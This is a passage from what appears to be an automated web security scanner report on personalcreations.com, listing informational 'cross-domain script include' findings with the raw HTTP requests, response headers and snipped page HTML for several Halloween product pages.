Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close
Content-Length: 351790

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.29. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-clothes-PHALAPP

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:14 GMT
Connection: close
Content-Length: 333277

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.30. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-gifts-PHALLOW

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 211789

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.31. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-treat-bags-PHALBAG

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:35 GMT
Connection: close
Content-Length: 110641

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
